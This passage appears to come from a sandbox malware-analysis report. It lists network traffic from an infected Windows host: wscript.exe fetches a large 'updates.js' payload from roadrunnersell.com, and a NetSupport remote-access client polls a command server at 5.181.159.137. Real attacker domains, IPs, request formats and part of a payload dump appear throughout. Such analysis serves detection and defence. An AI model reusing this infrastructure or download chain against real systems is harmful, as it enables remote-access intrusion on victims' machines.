                                                                              Sep 25, 2024 19:02:37.701821089 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.701834917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.701913118 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.702512026 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.702528000 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.702603102 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.702616930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.702688932 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.703677893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.703715086 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.703790903 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.703804970 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.703866959 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.703952074 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.703967094 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.704057932 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.704071999 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.704138041 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.705959082 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.705974102 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.706043005 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.706056118 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.706121922 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.706342936 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.706360102 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.706434011 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.706446886 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.706513882 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.707180023 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.707195044 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.707266092 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.707278967 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.707344055 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.709428072 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709443092 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709525108 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.709538937 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709605932 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.709774971 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709789991 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709861994 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.709876060 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.709945917 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710113049 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710127115 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710201979 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710215092 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710279942 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710838079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710853100 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.710956097 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.710969925 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.711035967 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.713057041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.713071108 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.713150978 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.713165045 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.713232040 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.714355946 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714397907 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714437962 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.714449883 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714469910 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.714487076 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.714549065 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.717644930 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:39.597353935 CEST49706443192.168.2.165.181.159.137
                                                                              Sep 25, 2024 19:02:39.597414970 CEST443497065.181.159.137192.168.2.16
                                                                              Sep 25, 2024 19:02:39.597516060 CEST49706443192.168.2.165.181.159.137
                                                                              Sep 25, 2024 19:02:41.192086935 CEST49706443192.168.2.165.181.159.137
                                                                              Sep 25, 2024 19:02:41.192126989 CEST443497065.181.159.137192.168.2.16
                                                                              Sep 25, 2024 19:02:41.192193985 CEST443497065.181.159.137192.168.2.16
                                                                              Sep 25, 2024 19:02:45.084852934 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:45.091741085 CEST8049707104.26.1.231192.168.2.16
                                                                              Sep 25, 2024 19:02:45.091878891 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:45.093050957 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:45.098026037 CEST8049707104.26.1.231192.168.2.16
                                                                              Sep 25, 2024 19:02:45.838002920 CEST8049707104.26.1.231192.168.2.16
                                                                              Sep 25, 2024 19:02:45.838260889 CEST4970780192.168.2.16104.26.1.231
                                                                              Sep 25, 2024 19:02:48.493707895 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:48.493809938 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:48.493937016 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:48.544842958 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:48.544888020 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.149912119 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.150012016 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.153981924 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.154012918 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.154297113 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.154364109 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.155967951 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.156296968 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.156332016 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.299979925 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.300029039 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.300096989 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300163984 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300204039 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300256014 CEST4434970979.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:49.300283909 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:49.300334930 CEST49709443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.610150099 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.610250950 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:53.610358953 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.634903908 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:53.634948969 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.103105068 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.103279114 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.107994080 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.108026981 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.108515024 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.108577013 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.113015890 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.113353968 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.113404036 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254369974 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254441023 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254472017 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254503012 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254548073 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254548073 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254548073 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254576921 CEST4434971079.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:03:54.254628897 CEST49710443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:03:54.254628897 CEST49710443192.168.2.1679.141.163.131

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Sep 25, 2024 19:02:12.045872927 CEST4990753192.168.2.161.1.1.1
                                                                              Sep 25, 2024 19:02:12.066792965 CEST53499071.1.1.1192.168.2.16
                                                                              Sep 25, 2024 19:02:42.514621973 CEST5187953192.168.2.161.1.1.1
                                                                              Sep 25, 2024 19:02:42.526077986 CEST53518791.1.1.1192.168.2.16

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Sep 25, 2024 19:02:12.045872927 CEST192.168.2.161.1.1.10x2cc6Standard query (0)roadrunnersell.comA (IP address)IN (0x0001)false
                                                                              Sep 25, 2024 19:02:42.514621973 CEST192.168.2.161.1.1.10x712dStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Sep 25, 2024 19:02:12.066792965 CEST1.1.1.1192.168.2.160x2cc6No error (0)roadrunnersell.com79.141.163.131A (IP address)IN (0x0001)false
                                                                              Sep 25, 2024 19:02:42.526077986 CEST1.1.1.1192.168.2.160x712dNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                              Sep 25, 2024 19:02:42.526077986 CEST1.1.1.1192.168.2.160x712dNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                              Sep 25, 2024 19:02:42.526077986 CEST1.1.1.1192.168.2.160x712dNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • roadrunnersell.com
                                                                              • 5.181.159.137connection: keep-alivecmd=pollinfo=1ack=1
                                                                              • geo.netsupportsoftware.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.16497065.181.159.1374433056C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Sep 25, 2024 19:02:41.192086935 CEST218OUTPOST http://5.181.159.137/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.181.159.137Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                              Data Raw:
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              1192.168.2.1649707104.26.1.23180
                                                                              TimestampBytes transferredDirectionData
                                                                              Sep 25, 2024 19:02:45.093050957 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                              Host: geo.netsupportsoftware.com
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              Sep 25, 2024 19:02:45.838002920 CEST931INHTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:45 GMT
                                                                              Content-Type: text/html; Charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              CF-Ray: 8c8c956e7d6c42c9-EWR
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: private
                                                                              Set-Cookie: ASPSESSIONIDSQCTDCAQ=ODGLFFNBCNFIAOJGOBPEDGGM; path=/
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                              Vary: Accept-Encoding
                                                                              cf-apo-via: origin,host
                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKePRLi79EYdUrBNPnVpST0KL6FutXSdGHUMhPUpHy%2B7mEmwFkFPYYJJY1gwSGMk2R4KoHFXBY4fUOl5JYUxG4jPpwhR4LVUDD%2F38um2MN3VKnPH1A9tVBnyOMxTrEmIb8gv6VezFyzMfAzl"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 1040.7357,-74.17240


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.164970479.141.163.1314433528C:\Windows\System32\wscript.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-09-25 17:02:12 UTC384OUTPOST /trade/fix.php?532 HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-ch
                                                                              UA-CPU: AMD64
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: roadrunnersell.com
                                                                              Content-Length: 7
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-09-25 17:02:12 UTC7OUTData Raw: 31 31 41 58 41 51 3d
                                                                              Data Ascii: 11AXAQ=
                                                                              2024-09-25 17:02:12 UTC357INHTTP/1.1 200 OK
                                                                              Date: Wed, 25 Sep 2024 17:02:12 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Content-Description: File Transfer
                                                                              Content-Disposition: attachment; filename=updates.js
                                                                              Content-Transfer-Encoding: binary
                                                                              Expires: 0
                                                                              Cache-Control: must-revalidate
                                                                              Pragma: public
                                                                              Content-Length: 2292504
                                                                              Connection: close
                                                                              Content-Type: application/octet-stream
                                                                              2024-09-25 17:02:12 UTC7835INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6f 28 69 2c 20 66 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 6e 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 20 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3d 3d 20 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 20 26 26 20 72 65 71 75 69 72 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 66 20 26 26 20 63 29 20 72 65 74 75 72 6e 20 63 28 69 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: (function() { function r(e, n, t) { function o(i, f) { if (!n[i]) { if (!e[i]) { var c = "function" == typeof require && require; if (!f && c) return c(i, !0);
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 6e 75 6c 6c 0a 7d 2c 20 22 65 73 36 22 29 3b 0a 65 2e 66 69 6e 64 49 6e 74 65 72 6e 61 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0a 20 20 20 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 20 26 26 20 28 61 20 3d 20 53 74 72 69 6e 67 28 61 29 29 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 66 20 3d 20 61 2e 6c 65 6e 67 74 68 2c 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 3b 20 67 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 61 5b 67 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 63 61 6c 6c 28 63 2c 20 68 2c 20 67 2c 20 61 29
                                                                              Data Ascii: return !1 } } } return null}, "es6");e.findInternal = function(a, b, c) { a instanceof String && (a = String(a)); for (var f = a.length, g = 0; g < f; g++) { var h = a[g]; if (b.call(c, h, g, a)
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 62 0a 7d 3b 0a 6b 2e 63 72 61 77 20 3d 20 7b 7d 3b 0a 76 61 72 20 61 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 57 69 6e 64 6f 77 42 6f 75 6e 64 73 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 3b 0a 61 61 2e 69 6d 70 6c 5f 20 3d 20 61 61 3b 0a 6b 2e 63 72 61 77 2e 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 44 65 6c 65 67 61 74 65 20 3d 20 61 61 3b 0a 76 61 72 20 63 61 20 3d 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 72 6c 5f 20 3d 20 61 3b 0a 20 20 20 20 74 68 69 73 2e 75 73 65 41 75 74 68 5f 20 3d 20 62 0a 7d 3b 0a 63 61 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 74
                                                                              Data Ascii: b};k.craw = {};var aa = function() {};aa.prototype.getWindowBounds = function() {};aa.impl_ = aa;k.craw.AppBackgroundDelegate = aa;var ca = function(a, b) { this.url_ = a; this.useAuth_ = b};ca.prototype.getUrl = function() { return t
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 63 20 3c 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 20 63 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 20 3d 20 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 66 29 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 67 20 3d 20 30 3b 20 67 20 3c 20 66 2e 6c 65 6e 67 74 68 3b 20 67 20 2b 3d 20 38 31 39 32 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 68 20 3d 20 45 61 28 66 2c 20 67 2c 20 67 20 2b 20 38 31 39 32 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 20 3d 20 50 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 6c 20 3d
                                                                              Data Ascii: c < arguments.length; c++) { var f = arguments[c]; if (Array.isArray(f)) for (var g = 0; g < f.length; g += 8192) { var h = Ea(f, g, g + 8192); h = Pa.apply(null, h); for (var l =
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 20 20 69 66 20 28 63 20 26 26 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 69 66 20 28 61 20 3d 20 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 20 22 37 2e 30 22 20 3d 3d 20 63 5b 31 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 61 20 26 26 20 61 5b 31 5d 29 20 73 77 69 74 63 68 20 28 61 5b 31 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 34 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 22 38 2e 30 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 22 35 2e 30 22 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20
                                                                              Data Ascii: if (c && c[1]) if (a = /Trident\/(\d.\d)/.exec(a), "7.0" == c[1]) if (a && a[1]) switch (a[1]) { case "4.0": b = "8.0"; break; case "5.0": b
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 66 61 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 68 65 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 69 77 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 70 73 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 32 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 7c 7c 20 22 73 64 22 20 3d 3d 20 6b 2e 4c 4f 43 41 4c 45 2e 73
                                                                              Data Ascii: ALE.substring(0, 2).toLowerCase() || "fa" == k.LOCALE.substring(0, 2).toLowerCase() || "he" == k.LOCALE.substring(0, 2).toLowerCase() || "iw" == k.LOCALE.substring(0, 2).toLowerCase() || "ps" == k.LOCALE.substring(0, 2).toLowerCase() || "sd" == k.LOCALE.s
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 74 68 29 20 72 65 74 75 72 6e 20 21 31 3b 0a 20 20 20 20 61 20 3d 20 61 2e 6d 61 74 63 68 28 2f 5b 3f 26 5d 62 6f 64 79 3d 28 5b 5e 26 5d 2a 29 2f 29 5b 31 5d 3b 0a 20 20 20 20 69 66 20 28 21 61 29 20 72 65 74 75 72 6e 20 21 30 3b 0a 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 63 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 21 31 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 2f 5e 28 3f 3a 5b 61 2d 7a 30 2d 39 5c 2d 5f 2e 7e 5d 7c 25 5b 30 2d 39 61 2d 66 5d 7b 32 7d 29 2b 24 2f 69 2e 74 65 73 74 28 61 29 0a 7d 3b 0a 6b 2e 68 74 6d 6c 2e 53 61 66 65 55 72 6c 2e 66 72 6f 6d 53 73 68 55 72 6c 20 3d 20 66 75 6e 63 74 69 6f 6e
                                                                              Data Ascii: th) return !1; a = a.match(/[?&]body=([^&]*)/)[1]; if (!a) return !0; try { decodeURIComponent(a) } catch (c) { return !1 } return /^(?:[a-z0-9\-_.~]|%[0-9a-f]{2})+$/i.test(a)};k.html.SafeUrl.fromSshUrl = function
                                                                              2024-09-25 17:02:13 UTC16384INData Raw: 2b 20 62 20 2b 20 27 22 20 72 65 71 75 69 72 65 73 20 67 6f 6f 67 2e 73 74 72 69 6e 67 2e 43 6f 6e 73 74 20 76 61 6c 75 65 2c 20 22 27 20 2b 20 63 20 2b 20 27 22 20 67 69 76 65 6e 2e 27 20 3a 20 22 22 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 69 6e 20 6b 2e 68 74 6d 6c 2e 53 61 66 65 48 74 6d 6c 2e 55 52 4c 5f 41 54 54 52 49 42 55 54 45 53 5f 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 29 20 63 20 3d 20 6b 2e 68 74 6d 6c 2e 54 72 75 73 74 65 64 52 65 73 6f 75 72 63 65 55 72 6c 2e 75 6e 77 72 61 70 28 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 20 69 66 20 28 63 20 69
                                                                              Data Ascii: + b + '" requires goog.string.Const value, "' + c + '" given.' : ""); if (b.toLowerCase() in k.html.SafeHtml.URL_ATTRIBUTES_) if (c instanceof k.html.TrustedResourceUrl) c = k.html.TrustedResourceUrl.unwrap(c); else if (c i
